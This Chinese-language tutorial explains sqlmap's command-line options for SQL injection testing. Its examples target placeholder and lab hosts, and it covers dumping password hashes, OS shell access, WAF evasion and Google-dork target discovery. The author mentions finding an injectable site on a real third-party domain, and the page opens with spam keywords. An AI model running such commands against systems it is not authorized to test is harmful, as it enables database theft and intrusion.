3atv精品不卡视频,97人人超碰国产精品最新,中文字幕av一区二区三区人妻少妇,久久久精品波多野结衣,日韩一区二区三区精品

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

sqlmap工具命令行的含义

發布時間:2025/6/15 编程问答 22 豆豆
生活随笔 收集整理的這篇文章主要介紹了 sqlmap工具命令行的含义 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

SQLMAP參數介紹

sqlmap的使用方式:python sqlmap.py [options];

sqlmap中一共有以下十六個選項卡:

  • 幫助選項卡;
  • Target(目標選項卡);
  • Request(請求選項卡);
  • Optimization(優化選項卡);
  • Injection(注射選項卡);
  • Detection(探測選項卡);
  • Techniques(注入技術選項卡);
  • Fingerprint(指紋選項卡);
  • Enumeration(列數據選項卡);
  • Brute force(爆破選項卡);
  • User-defined function injection(用戶自定義函數注入選項卡);
  • File system access(系統文件操作選項卡);
  • Operation system access(操作系統訪問選項卡);
  • Windows registry access(Windows注冊表選項卡);
  • General(一般選項卡);
  • Miscellaneous(雜項);
  • 1、幫助選項卡

    • -h, ? ?–help ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 顯示基礎的幫助信息并退出;
    • -hh ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?顯示進一步的幫助信息并退出;
    • –version ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?顯示程序的版本并退出;
    • -v ?VERBOSE ? ? ? ? ? ? ? ? ? ? ? ? ? 詳細級別:0-6(默認為1);

    2、Target(目標選項卡):在這些選項卡中至少有一個要設置目標

    • -d ?DIRECT ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 直接連接到數據庫;
    • -u ?URL, –url=URL ? ? ? ? ? ? ? 目標URL;
    • -l ? ?LOGFILE ? ? ? ? ? ? ? ? ? ? ? ? ? ?從Burp或者WebScarab代理中解析目標;
    • -m ?BULKFILE ? ? ? ? ? ? ? ? ? ? ? ?在一個給定的文本文件中掃描目標;
    • -r ? REQUESTFILE ? ? ? ? ? ? ? ? 從文件中加載HTTP 請求 ;
    • -g ? GOOGLEDORK ? ? ? ? ? ? ? ? 利用GOOGLEDORK獲取目標URL;
    • -c ? CONFIGFILE ? ? ? ? ? ? ? ? ? ?從配置INI文件中加載選項;

    3、Request(請求選項卡):這些選項可以用來指定如何連接到目標URL。

    • ?–data=DATA ? ? ? ? ? ? ? ? ? ? ? ??通過POST發送數據串;

    • –param-del=PDEL ? ? ? ? ? ? ??字符用于分割的參數值(當GET或POST的數據需要用其他字符分割測試參數的時候需要用到此參數。);
    • –cookie=COOKIE ? ? ? ? ? ? ? ? ?HTTP Cookie 頭;
    • –cookie-del=CDEL ? ? ? ? ? ? ??字符用于分裂的cookie值;
    • –load-cookies=L.. ? ? ? ? ? ? ? ?在Netscape/ wget格式的文件中包含cookie;
    • –drop-set-cookie ? ? ? ? ? ? ? ? ?忽略Set-Cookie頭響應;
    • –user-agent=AGENT ? ? ? ? ? ?HTTP User-Agent 頭;
    • –random-agent ? ? ? ? ? ? ? ? ? ? ?使用隨機選擇HTTP User-Agent頭;
    • –host=HOST ? ? ? ? ? ? ? ? ? ? ? ? ? ??HTTP Host 頭;
    • –referer=REFERER ? ? ? ? ? ? ??HTTP Referer 頭;
    • –headers=HEADERS ? ? ? ? ? ?額外的頭文件(如:?”Accept-Language: fr\nETag: 123″);
    • –auth-type=AUTH.. ? ? ? ? ? ??HTTP身份驗證類型 (Basic, Digest, NTLM 或者 PKI);
    • –auth-cred=AUTH.. ? ? ? ? ? ??HTTP身份驗證憑據?(name:password);
    • –auth-private=A.. ? ? ? ? ? ? ? ??HTTP認證PEM私鑰文件;
    • –proxy=PROXY ? ? ? ? ? ? ? ? ? ?使用代理服務器連接到目標URL;
    • –proxy-cred=PRO.. ? ? ? ? ? ? 代理身份驗證憑據?(name:password);
    • –proxy-file=PRO.. ? ? ? ? ? ? ? ?從文件加載代理列表;
    • –ignore-proxy ? ? ? ? ? ? ? ? ? ? ? 忽略系統默認的代理設置;
    • –tor ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??使用Tor的匿名網絡;
    • –tor-port=TORPORT ? ? ? ? ? 設置默認以外的Tor代理端口;
    • –tor-type=TORTYPE ? ? ? ? ??設置Tor代理類型 (HTTP (默認), SOCKS4 或者 SOCKS5);
    • –check-tor ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 檢查Tor是否正確使用;
    • –delay=DELAY ? ? ? ? ? ? ? ? ? ? ?每個HTTP請求之間的延遲秒;
    • –timeout=TIMEOUT ? ? ? ? ? ?等待超時連接(默認為30秒);
    • –retries=RETRIES ? ? ? ? ? ? ? ??嘗試連接超時(默認為3);
    • –randomize=RPARAM ? ? ? ?隨意改變給定的參數值;
    • –safe-url=SAFURL ? ? ? ? ? ? ? ?在測試過程中經常訪問的URL地址;
    • –safe-freq=SAFREQ ? ? ? ? ? ? ?在兩次訪問之間提供安全URL的請求;
    • –skip-urlencode ? ? ? ? ? ? ? ? ? ??跳過URL編碼的有效載荷數據;
    • –force-ssl ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?強制使用SSL/ HTTPS;
    • –hpp ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?使用HTTP參數污染;
    • ?–eval=EVALCODE ? ? ? ? ? ? ? ?在每次請求時根據所寫python代碼做完修改后請求。

    4、Optimization(優化選項卡):這些選項可以用來優化SqlMap的性能

    • -o ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??打開所有優化開關;
    • –predict-output ? ? ? ? ? ? ? ? ? ??常見的查詢輸出預測;
    • –keep-alive ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?使用持久HTTP(S)連接;
    • –null-connection ? ? ? ? ? ? ? ? ?沒有實際的HTTP響應的檢索頁面長度;
    • –threads=THREADS ? ? ? ? ? ?并發的HTTP(S)請求的最大數量(默認為1)。

    5、Injection(注射選項卡):這些選項可以用來指定對哪些參數測試,提供一般的注入方式和可選可修改的腳本注入

    • -p ?TESTPARAMETER ? ? ? ? ?可測試的參數;
    • –skip=SKIP ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?跳過給定的參數;
    • –dbms=DBMS ? ? ? ? ? ? ? ? ? ? ? ?指定數據庫類型;
    • –dbms-cred=DBMS.. ? ? ? ? ? 數據庫身份驗證憑據(user:password);
    • –os=OS ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?指定數據庫的操作系統;
    • –invalid-bignum ? ? ? ? ? ? ? ? ? 指定無效的大數字;
    • –invalid-logical ? ? ? ? ? ? ? ? ? ? 指定無效的邏輯運算;
    • –no-cast ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?關閉payload構造機制;
    • –no-escape ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?關閉字符逃避機制;
    • –prefix=PREFIX ? ? ? ? ? ? ? ? ? ?注射前綴字符串payload;
    • –suffix=SUFFIX ? ? ? ? ? ? ? ? ? ??注射后綴字符串payload;
    • –tamper=TAMPER ? ? ? ? ? ? ? 使用給定的腳本修改注入的數據。

    6、Detection(探測選項卡):這些選項可以用來定制檢測階段

    • –level=LEVEL ? ? ? ? ? ? ? ? ? ? ? ??測試的等級(1-5,默認為1);
    • –risk=RISK ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 測試的風險等級(0-3,默認為1);
    • –string=STRING ? ? ? ? ? ? ? ? ? ??字符串匹配查詢時被評估為True;
    • –not-string=NOT.. ? ? ? ? ? ? ? ??字符串匹配查詢時被評估為False;
    • –regexp=REGEXP ? ? ? ? ? ? ? ? ?正則表達式匹配查詢時被評估為True;
    • –code=CODE ? ? ? ? ? ? ? ? ? ? ? ? ? ?HTTP代碼以匹配查詢時被評估為True;
    • –text-only ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 只基于文本的內容的頁面的對比;
    • –titles ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?只基于Title的內容的對比。

    7、Techniques(注入技術選項卡):這些選項可以用來調整特定的SQL注入測試

    • –technique=TECH ? ? ? ? ? ? ? ? ?使用SQL注入技術?(默認是”BEUSTQ”);
    • –time-sec=TIMESEC ? ? ? ? ? ? ?DBMS響應延遲(默認為5秒);
    • –union-cols=UCOLS ? ? ? ? ? ? ??SQL注入UNION查詢測試的列的范圍;
    • –union-char=UCHAR ? ? ? ? ? ?設定UNION查詢使用的字符;
    • –union-from=UFROM ? ? ? ? ? (需要更新);
    • –dns-domain=DNS.. ? ? ? ? ? ? ??用于域名DNS溢出攻擊;
    • –second-order=S.. ? ? ? ? ? ? ? ? ?有些時候注入點輸入的數據看返回結果的時候并不是當前的頁面,而是另外的一個頁面,這時候就需要指定到哪個頁面獲取響應判斷真假。

    8、Fingerprint(指紋選項卡)

    • -f, ?–fingerprint ? ? ? ? ? ? ? ? ? ? ? ? 演示廣泛的DBMS版本指紋。

    9、Enumeration(列數據選項卡):這些選項可以用來枚舉數據庫管理系統的信息、結構和數據表,還可以運行自己的SQL語句

    • -a, –all ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 枚舉所有;
    • -b, –banner ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??檢索DBMS 的banner信息;
    • –current-user ? ? ? ? ? ? ? ? ? ? ? ? ? ?檢索DBMS 的當前用戶;
    • –current-db ??? ? ? ? ? ? ? ? ? ? ? ? ? ? ?檢索DBMS 的當前數據庫;
    • –hostname ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?檢索DBMS 的服務器的主機名;
    • –is-dba ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?檢測當前用戶是否是DBA;
    • –users ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?枚舉DBMS用戶;
    • –passwords ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??枚舉DBMS用戶密碼哈希;
    • –privileges ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??枚舉DBMS用戶權限;
    • –roles ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??枚舉DBMS用戶角色;
    • –dbs ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?枚舉DBMS數據庫;
    • –tables ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??枚舉DBMS數據庫表;
    • –columns ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?枚舉的DBMS數據庫表和列
    • –schema ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?枚舉DBMS模式;
    • –count ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?檢索表的數目;
    • –dump ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?轉儲DBMS數據庫表項;
    • –dump-all ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??轉儲所有的DBMS數據庫表條目;
    • –search ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?搜索列,表和\或數據庫名稱;
    • –comments ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?檢索DBMS意見;
    • -D DB ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?指定DBMS數據庫枚舉;
    • -T TBL ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?指定DBMS數據庫的表枚舉;
    • -C COL ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?指定DBMS數據庫的列枚舉;
    • -U USER ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?指定DBMS用戶枚舉;
    • –exclude-sysdbs ? ? ? ? ? ? ? ? ? ? ? ?在枚舉表時排除DBMS系統數據庫;
    • –start=LIMITSTART ? ? ? ? ? ? ? ?指定輸出的開始;
    • –stop=LIMITSTOP ? ? ? ? ? ? ? ? ? ?指定輸出的結束;
    • –first=FIRSTCHAR ? ? ? ? ? ? ? ? ? ?指定輸出的開始的字符;
    • –last=LASTCHAR ? ? ? ? ? ? ? ? ? ? ? 指定輸出的開始的結束;
    • –sql-query=QUERY ? ? ? ? ? ? ? ? ??要執行的SQL語句;
    • –sql-shell ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?提示一個交互式SQL shell;
    • –sql-file=SQLFILE ? ? ? ? ? ? ? ? ? ? ?從給定的文件中執行SQL語句。

    10、Brute force(爆破選項卡):這些選項可以用來運行暴力檢查

    • –common-tables ? ? ? ? ? ? ? ? ? ? ? ??檢查存在的通用表;
    • –common-columns? ? ? ? ? ? ? ? ? ??檢查存在的通用列。

    11、User-defined function injection(用戶自定義函數注入選項卡):這些選項可以用來創建用戶自定義功能

    • –udf-inject ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?注入用戶自定義功能;
    • ?–shared-lib=SHLIB ? ? ? ? ? ? ? ? ? ?本地的共享庫的路徑。

    12、File system access(系統文件操作選項卡):這些選項可以被用于訪問后端數據庫管理系統相關的文件系統

    • –file-read=RFILE ? ? ? ? ? ? ? ? ? ? ? ?從后端的DBMS文件系統中讀取文件;
    • –file-write=WFILE ? ? ? ? ? ? ? ? ? ? ?在后端的DBMS文件系統中寫一個本地文件;
    • –file-dest=DFILE ? ? ? ? ? ? ? ? ? ? ? ??后端DBMS絕對文件路徑寫入。

    13、Operation system access(操作系統訪問選項卡):這些選項可以被用于訪問后端數據庫管理系統相關的操作系統

    • –os-cmd=OSCMD ? ? ? ? ? ? ? ? ? ? ? ??執行操作系統命令;
    • –os-shell ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?提示交互式操作系統shell;
    • –os-pwn ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 為OOB shell, meterpreter 或 VNC提示輸入;
    • –os-smbrelay ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 單擊為OOB shell, meterpreter 或 VNC提示輸入;
    • –os-bof ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??存儲過程緩沖區溢出;
    • –priv-esc ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?數據庫進程的用戶特權升級;
    • –msf-path=MSFPATH ? ? ? ? ? ? ? ?本地安裝Metasploit的框架路徑;
    • –tmp-path=TMPPATH ? ? ? ? ? ? ??遠程臨時文件目錄的絕對路徑。

    14、Windows registry access(Windows注冊表選項卡):這些選項可以用來訪問后端數據庫管理系統Windows注冊表

    • –reg-read ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?讀取一個Windows注冊表項值;
    • –reg-add ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?編寫一個Windows注冊表項值數據;
    • –reg-del ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??刪除Windows注冊表鍵值;
    • –reg-key=REGKEY ? ? ? ? ? ? ? ? ? ? ? ?Windows注冊表鍵;
    • –reg-value=REGVAL ? ? ? ? ? ? ? ? ? ?Windows注冊表鍵值;
    • –reg-data=REGDATA ? ? ? ? ? ? ? ? ??Windows注冊表的鍵值項數據;
    • –reg-type=REGTYPE ? ? ? ? ? ? ? ? ? ?Windows注冊表鍵的值類型。

    15、General(一般選項卡):這些選項可以用來設置一些一般性的工作參數

    • -s SESSIONFILE ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?從一個存儲文件中加載會話;
    • -t TRAFFICFILE ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?記錄所有HTTP流量到一個文本文件中;
    • –batch ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?不要求用戶輸入,使用默認的行為
    • –charset=CHARSET ? ? ? ? ? ? ? ? ? ? ?使用字符編碼數據檢索
    • –crawl=CRAWLDEPTH ? ? ? ? ? ? ? ?從目標網站抓取URL;
    • –csv-del=CSVDEL ? ? ? ? ? ? ? ? ? ? ? ? ?使用字符分隔對CSV輸出(默認為“,”);
    • –dump-format=DU.. ? ? ? ? ? ? ? ? ? ? dump的數據格式(CSV(默認),HTML或SQLite);
    • –eta ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?每個輸出顯示的預計抵達時間;
    • –flush-session ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?清除當前目標的會話文件;
    • –forms ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??目標URL解析和測試形式;
    • –fresh-queries ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?將忽略的查詢結果存儲在會話文件;
    • –hex ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??使用DBMS十六進制數據檢索功能;
    • –output-dir=ODIR ? ? ? ? ? ? ? ? ? ? ? ? ?自定義輸出的目錄路徑;
    • –parse-errors ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??將響應DBMS錯誤消息解析并顯示;
    • –pivot-column=P.. ? ? ? ? ? ? ? ? ? ? ? ? 關鍵列名;
    • –save ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?配置INI文件保存選項;
    • –scope=SCOPE ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??正則表達式來過濾目標提供的代理日志;
    • –test-filter=TE.. ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??選擇測試的有效的payload;
    • –update ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 更新SQLMAP。

    16、Miscellaneous(雜項)

    • ?-z?MNEMONICS ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??使用短助記符;

    • –alert=ALERT ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?當發現SQL注入時運行主機操作系統命令;
    • –answers=ANSWERS ? ? ? ? ? ? ? ? ? ??設置問題答案;
    • –beep ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?發現SQL注入時做一個蜂鳴聲;
    • –check-waf ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 啟發式檢查WAF/ IPS / IDS保護;
    • –cleanup ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?清理SqlMap中DBMS的特定UDF和表;
    • –dependencies ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??檢查缺失的SqlMap依賴;
    • –disable-coloring ? ? ? ? ? ? ? ? ? ? ? ? ? ?禁用控制臺輸出著色;
    • –gpage=GOOGLEPAGE ? ? ? ? ? ? ? ? 使用Google搜索結果的指定頁碼;
    • –identify-waf ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??為WAF/ IPS / IDS保護做一個通過測試;
    • –mobile ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??模仿智能手機通過HTTP User-Agent頭;
    • –page-rank ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?對google搜索的結果顯示網頁的PR值;
    • –purge-output ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?安全刪除所有內容的輸出目錄;
    • –smart ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?只對知道的啟發式進行測試;
    • –wizard ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??初級用戶的簡單的向導界面。

    ?

    ?

    ?

    http://192.168.136.131/sqlmap/mysql/get_int.php?id=1

    當給sqlmap這么一個url的時候,它會:

    1、判斷可注入的參數

    2、判斷可以用那種SQL注入技術來注入

    3、識別出哪種數據庫

    4、根據用戶選擇,讀取哪些數據

    sqlmap支持五種不同的注入模式:

    1、基于布爾的盲注,即可以根據返回頁面判斷條件真假的注入。

    2、基于時間的盲注,即不能根據頁面返回內容判斷任何信息,用條件語句查看時間延遲語句是否執行(即頁面返回時間是否增加)來判斷。

    3、基于報錯注入,即頁面會返回錯誤信息,或者把注入的語句的結果直接返回在頁面中。

    4、聯合查詢注入,可以使用union的情況下的注入。

    5、堆查詢注入,可以同時執行多條語句的執行時的注入。

    sqlmap支持的數據庫有:

    MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB

    可以提供一個簡單的URL,Burp或WebScarab請求日志文件,文本文檔中的完整http請求或者Google的搜索,匹配出結果頁面,也可以自己定義一個正則來判斷那個地址去測試。

    測試GET參數,POST參數,HTTP Cookie參數,HTTP User-Agent頭和HTTP Referer頭來確認是否有SQL注入,它也可以指定用逗號分隔的列表的具體參數來測試。

    可以設定HTTP(S)請求的并發數,來提高盲注時的效率。

    Youtube上有人做的使用sqlmap的視頻:

    http://www.youtube.com/user/inquisb/videos

    http://www.youtube.com/user/stamparm/videos

    使用sqlmap的實例文章:

    http://unconciousmind.blogspot.com/search/label/sqlmap

    可以點擊https://github.com/sqlmapproject/sqlmap/tarball/master下載最新版本sqlmap。

    也可以使用git來獲取sqlmap

    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

    之后可以直接使用命令來更新

    python sqlmap.py --update

    或者

    git pull

    更新sqlmap

    如果你想觀察sqlmap對一個點是進行了怎樣的嘗試判斷以及讀取數據的,可以使用-v參數。

    共有七個等級,默認為1:

    0、只顯示python錯誤以及嚴重的信息。

    1、同時顯示基本信息和警告信息。(默認)

    2、同時顯示debug信息。

    3、同時顯示注入的payload。

    4、同時顯示HTTP請求。

    5、同時顯示HTTP響應頭。

    6、同時顯示HTTP響應頁面。

    如果你想看到sqlmap發送的測試payload最好的等級就是3。
    獲取目標方式
    目標URL

    參數:-u或者--url

    格式:http(s)://targeturl[:port]/[…]

    例如:python sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users

    從Burp或者WebScarab代理中獲取日志

    參數:-l

    可以直接吧Burp proxy或者WebScarab proxy中的日志直接倒出來交給sqlmap來一個一個檢測是否有注入。
    從文本中獲取多個目標掃描

    參數:-m

    文件中保存url格式如下,sqlmap會一個一個檢測

    www.target1.com/vuln1.php?q=foobar

    www.target2.com/vuln2.asp?id=1

    www.target3.com/vuln3/id/1*

    從文件中加載HTTP請求

    參數:-r

    sqlmap可以從一個文本文件中獲取HTTP請求,這樣就可以跳過設置一些其他參數(比如cookie,POST數據,等等)。

    比如文本文件內如下:

    POST /vuln.php HTTP/1.1
    Host: www.target.com
    User-Agent: Mozilla/4.0

    id=1

    當請求是HTTPS的時候你需要配合這個--force-ssl參數來使用,或者你可以在Host頭后門加上:443
    處理Google的搜索結果

    參數:-g

    sqlmap可以測試注入Google的搜索結果中的GET參數(只獲取前100個結果)。

    例子:

    python sqlmap.py -g "inurl:\".php?id=1\""

    (很牛B的功能,測試了一下,第十幾個就找到新浪的一個注入點)

    此外可以使用-c參數加載sqlmap.conf文件里面的相關配置。
    請求
    http數據

    參數:--data

    此參數是把數據以POST方式提交,sqlmap會像檢測GET參數一樣檢測POST的參數。

    例子:

    python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users

    參數拆分字符

    參數:--param-del

    當GET或POST的數據需要用其他字符分割測試參數的時候需要用到此參數。

    例子:

    python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs --users

    HTTP cookie頭

    參數:--cookie,--load-cookies,--drop-set-cookie

    這個參數在以下兩個方面很有用:

    1、web應用需要登陸的時候。

    2、你想要在這些頭參數中測試SQL注入時。

    可以通過抓包把cookie獲取到,復制出來,然后加到--cookie參數里。

    在HTTP請求中,遇到Set-Cookie的話,sqlmap會自動獲取并且在以后的請求中加入,并且會嘗試SQL注入。

    如果你不想接受Set-Cookie可以使用--drop-set-cookie參數來拒接。

    當你使用--cookie參數時,當返回一個Set-Cookie頭的時候,sqlmap會詢問你用哪個cookie來繼續接下來的請求。當--level的參數設定為2或者2以上的時候,sqlmap會嘗試注入Cookie參數。
    HTTP User-Agent頭

    參數:--user-agent,--random-agent

    默認情況下sqlmap的HTTP請求頭中User-Agent值是:

    sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)

    可以使用--user-anget參數來修改,同時也可以使用--random-agnet參數來隨機的從./txt/user-agents.txt中獲取。

    當--level參數設定為3或者3以上的時候,會嘗試對User-Angent進行注入。
    HTTP Referer頭

    參數:--referer

    sqlmap可以在請求中偽造HTTP中的referer,當--level參數設定為3或者3以上的時候會嘗試對referer注入。
    額外的HTTP頭

    參數:--headers

    可以通過--headers參數來增加額外的http頭
    HTTP認證保護

    參數:--auth-type,--auth-cred

    這些參數可以用來登陸HTTP的認證保護支持三種方式:

    1、Basic

    2、Digest

    3、NTLM

    例子:

    python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass"

    HTTP協議的證書認證

    參數:--auth-cert

    當Web服務器需要客戶端證書進行身份驗證時,需要提供兩個文件:key_file,cert_file。

    key_file是格式為PEM文件,包含著你的私鑰,cert_file是格式為PEM的連接文件。
    HTTP(S)代理

    參數:--proxy,--proxy-cred和--ignore-proxy

    使用--proxy代理是格式為:http://url:port。

    當HTTP(S)代理需要認證是可以使用--proxy-cred參數:username:password。

    --ignore-proxy拒絕使用本地局域網的HTTP(S)代理。
    HTTP請求延遲

    參數:--delay

    可以設定兩個HTTP(S)請求間的延遲,設定為0.5的時候是半秒,默認是沒有延遲的。
    設定超時時間

    參數:--timeout

    可以設定一個HTTP(S)請求超過多久判定為超時,10.5表示10.5秒,默認是30秒。
    設定重試超時

    參數:--retries

    當HTTP(S)超時時,可以設定重新嘗試連接次數,默認是3次。
    設定隨機改變的參數值

    參數:--randomize

    可以設定某一個參數值在每一次請求中隨機的變化,長度和類型會與提供的初始值一樣。
    利用正則過濾目標網址

    參數:--scope

    例如:

    python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"

    避免過多的錯誤請求被屏蔽

    參數:--safe-url,--safe-freq

    有的web應用程序會在你多次訪問錯誤的請求時屏蔽掉你以后的所有請求,這樣在sqlmap進行探測或者注入的時候可能造成錯誤請求而觸發這個策略,導致以后無法進行。

    繞過這個策略有兩種方式:

    1、--safe-url:提供一個安全不錯誤的連接,每隔一段時間都會去訪問一下。
    2、--safe-freq:提供一個安全不錯誤的連接,每次測試請求之后都會再訪問一邊安全連接。

    關掉URL參數值編碼

    參數:--skip-urlencode

    根據參數位置,他的值默認將會被URL編碼,但是有些時候后端的web服務器不遵守RFC標準,只接受不經過URL編碼的值,這時候就需要用--skip-urlencode參數。
    每次請求時候執行自定義的python代碼

    參數:--eval

    在有些時候,需要根據某個參數的變化,而修改另個一參數,才能形成正常的請求,這時可以用--eval參數在每次請求時根據所寫python代碼做完修改后請求。

    例子:

    python sqlmap.py -u "http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"

    上面的請求就是每次請求時根據id參數值,做一次md5后作為hash參數的值。
    注入
    測試參數

    參數:-p,--skip

    sqlmap默認測試所有的GET和POST參數,當--level的值大于等于2的時候也會測試HTTP Cookie頭的值,當大于等于3的時候也會測試User-Agent和HTTP Referer頭的值。但是你可以手動用-p參數設置想要測試的參數。例如: -p "id,user-anget"

    當你使用--level的值很大但是有個別參數不想測試的時候可以使用--skip參數。

    例如:--skip="user-angent.referer"

    在有些時候web服務器使用了URL重寫,導致無法直接使用sqlmap測試參數,可以在想測試的參數后面加*

    例如:

    python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/"

    sqlmap將會測試value1的位置是否可注入。
    指定數據庫

    參數:--dbms

    默認情況系sqlmap會自動的探測web應用后端的數據庫是什么,sqlmap支持的數據庫有:

    MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、SQLite、Firebird、Sybase、SAP MaxDB、DB2

    指定數據庫服務器系統

    參數:--os

    默認情況下sqlmap會自動的探測數據庫服務器系統,支持的系統有:Linux、Windows。
    指定無效的大數字

    參數:--invalid-bignum

    當你想指定一個報錯的數值時,可以使用這個參數,例如默認情況系id=13,sqlmap會變成id=-13來報錯,你可以指定比如id=9999999來報錯。
    只定無效的邏輯

    參數:--invalid-logical

    原因同上,可以指定id=13把原來的id=-13的報錯改成id=13 AND 18=19。
    注入payload

    參數:--prefix,--suffix

    在有些環境中,需要在注入的payload的前面或者后面加一些字符,來保證payload的正常執行。

    例如,代碼中是這樣調用數據庫的:

    $query = "SELECT * FROM users WHERE id=(’" . $_GET[’id’] . "’) LIMIT 0, 1";

    這時你就需要--prefix和--suffix參數了:

    python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "’)" --suffix "AND (’abc’=’abc"

    這樣執行的SQL語句變成:

    $query = "SELECT * FROM users WHERE id=(’1’) <PAYLOAD> AND (’abc’=’abc’) LIMIT 0, 1";

    修改注入的數據

    參數:--tamper

    sqlmap除了使用CHAR()函數來防止出現單引號之外沒有對注入的數據修改,你可以使用--tamper參數對數據做修改來繞過WAF等設備。

    下面是一個tamper腳本的格式:

    # Needed imports
    from lib.core.enums import PRIORITY
    # Define which is the order of application of tamper scripts against
    # the payload
    __priority__ = PRIORITY.NORMAL
